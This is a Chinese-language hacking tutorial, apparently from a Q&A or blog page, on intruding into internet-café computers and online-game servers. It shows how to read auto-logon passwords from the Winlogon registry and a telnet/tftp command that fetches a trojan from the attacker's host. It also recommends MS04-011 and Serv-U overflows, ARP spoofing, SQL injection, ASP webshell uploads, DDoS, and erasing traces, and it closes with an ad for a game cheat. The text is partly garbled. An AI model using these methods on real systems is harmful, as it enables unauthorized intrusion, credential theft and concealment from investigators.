从扫描目标服务器,到尝试攻击,后期的安装后门,以及后门的隐蔽工作,以及最后的防范追踪,不是说每个服务器的情况都是一样的,就算那个教程可以针对某一私服服务器,应该绝对不可能照搬到另一服务器,而且攻击服务器还是需要一些功底的,以及无数次的思考与尝试一
网吧入侵
入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者
windows
xp的机器,网管一般都把机子设置为自动登陆!这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfassexe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfassexe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。
你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnetexe我们也用不了,因为着个也依赖ipc连接,
dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。
开了telnet后,我们telnet上去,先在本机打开tftpd32exe,再telnet下面telnet
-i
myip
get
3721exe
c:\3721exe,这样就把我们的木马3721exe比如radmin传过去了。
再在telnet下面直接运行3721exe就ok了。
另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描19216801-1921680255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。
还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱闪电狐
——火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现服务器装了serv_u,而且你有了一个账号,可以尝试一下
serv_u的溢出。SHELL,网上这样的全自动抓鸡工具很多,大家可以上网搜索,不要怕有病毒,最好是找好点的黑客网站,比如这个,
1这里推荐大家一款全能软件:流光,查找漏洞、端口,绝对有效果;有的PC是局域网里的,那就可以
2通过入侵局域网里的其他电脑,然后ARP欺骗,也能达到入侵的目的,局域网里的情况很多,可能有的电脑还对此电脑开
放共享等等,情况很多,这里就不多说了。
3再说说入侵服务器IP,服务器都是挂网站的,很多网站都是挂在一个服务器上的,可以用旁注工具进行查找,找到网站的漏洞,像有的网站在主页上就有网站后台的选项,网站后台的账号和密码都是默认的(这里提醒一下那些网管,不要了吧,呵呵。还有的网站直接就有注入点,那样入侵就很简单了,中国的网站防护真的是……有的服务器好点的,网站只
挂了一个,还可能没漏洞,服务器本身也没有端口弱口令漏洞,那就只能入侵局域网里的网站,再ARP了,和上面入侵PC
4局域网的方法差不多。
其实大家看完后就知道了,入侵指定IP其实就是对你抓鸡技术的综合运用的考验,一定要认真对到每次入侵的过程,
多总结经验,文章只是参考,转化成自己的东西才是关键。在理论上并不难
第一:确定其服务器,一般来说一个网络游戏都会有一个或多个服务器构架,你必须先找到它们,可以通过检测、侦听客户端与服务端的地址互防,然后顺藤摸瓜找到其服务器的真正位置,当然,如今有很多技术可以避免你找到他们,但是作为一个动态服务器,它是没有可能逃过侦察的
第二:找到服务器后,你应当极尽所能的探知服务器的状况,也就是说你当通过各种手段了解其系统、运行特性,数据状况,有无备份及备份时间等等,知己知彼百战不殆!
第三:在详细了解起服务器状况,就可以着手对其实行绑票等计划,目前最好的选择是通过DDOS手段对其进行攻击,在其崩溃时予以入侵,将你预先编好的木马植入,要知道,这类服务器的数据库都是非常大的,如果你对那游戏的程序一无所知,几乎不可能找到你的数据存放地,而每一个网络游戏在制作之除就会考虑安全问题,所以,你下面要做的就是将游戏服务端下载出来并予以破截
第四:经过一番努力,你可能已经顺利完成了你的任务,不过别着急,在你兴奋之前应该先将那服务器中你曾经光顾的痕迹抹去。。。。。。。。感谢提问,你说的情况理论上是可能的!不过那么大个游戏公司安全人员也不是吃素的,不然还怎么在IT混。只有那些黑客中的高手可以达到。但是这种级别的黑客是不屑做这种事情的 ,最多是拿下服务器权限,而不会去修改数据。当然最好还不要去干这种事情。举荐朋友您用传奇凌霜辅助免费版功能比如有:中变服一键设置,禁止所有提示框,绝对锁定,野蛮挑战,锁定魔法位置,自动使用物品,战士挂机打怪,小退免等待,一键回城,等功能。支持目前所有的主流登录器!
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)